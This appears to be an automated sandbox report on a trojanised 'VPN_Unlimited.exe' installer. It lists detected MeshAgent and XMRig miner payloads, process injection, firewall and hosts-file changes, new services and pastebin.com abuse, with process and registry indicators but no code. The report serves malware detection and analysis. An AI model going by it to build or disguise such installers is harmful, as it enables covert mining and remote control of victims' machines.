Analysis Overview
SHA256
306acb2f7180dba3d077f0ab2ca0d22236c62e713c34533817c1814465eaa133
Threat Level: Known bad
The file VPN_Unlimited.exe was found to be: Known bad.
Malicious Activity Summary
MeshAgent
Detects MeshAgent payload
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Suspicious use of NtCreateProcessExOtherParentProcess
XMRig Miner payload
Modifies Windows Firewall
Drops file in Drivers directory
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Stops running service(s)
Creates new service(s)
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Power Settings
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
UPX packed file
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
Unsigned PE
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Program crash
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Uses Volume Shadow Copy service COM API
Kills process with taskkill
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-14 17:53
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-14 17:53
Reported
2024-10-14 17:56
Platform
win10v2004-20241007-en
Max time kernel
71s
Max time network
104s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2064 created 2576 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1160 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2888 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\SysWOW64\taskkill.exe |
| PID 4608 created 588 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2240 created 2576 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\System32\dllhost.exe |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe | N/A |
Loads dropped DLL
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Google\Chrome\updater.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3380 set thread context of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\jgt.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 2380 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 1552 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 2016 set thread context of 3636 | N/A | C:\ProgramData\Google\Chrome\updater.exe | C:\Windows\system32\dialer.exe |
| PID 1160 set thread context of 2296 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4608 set thread context of 2576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-PUHET.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-JOTU5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-3C56O.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-UKKDV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-7BA5B.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-2DM01.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-GO0H6.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-94EC3.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\imageformats\qgif.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\wireguard.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\vccorlib140.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-synch-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-P0RRE.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-LLAVV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-GL69A.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-UGC9D.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\imageformats\qico.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-CS5IM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\tunnel.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-A9COT.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-5B0RG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-GQIEG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-BVM42.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-localization-l1-2-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-10U63.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-0HU9E.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-UAGH5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-A6PV4.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-H9AKP.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-datetime-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-B1CDJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-00GOI.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-E30C5.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-HGHEV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-A1S4H.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-8UEJ8.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\is-TE462.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-VLMTK.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-timezone-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-IIJUL.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Window.2\is-4V264.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-processenvironment-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5WebEngineWidgets.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\api-ms-win-core-interlocked-l1-1-0.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-1OA7G.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-2KRAN.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-4US5J.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-KVHSM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\VPN Unlimited\Qt5QmlModels.dll | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-3FKLM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-VJN7U.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-EJJVT.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Layouts\is-F0U41.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\private\is-V6ATA.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-B1GIH.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-TSLBI.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Templates.2\is-RCJ2I.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-4UOEM.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\is-QUOQG.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-3CBFL.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtGraphicalEffects\is-IKQDV.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\QtQuick\Controls.2\Universal\is-K30FS.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| File created | C:\Program Files (x86)\VPN Unlimited\is-HB76B.tmp | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\taskkill.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5 | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Install(4).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
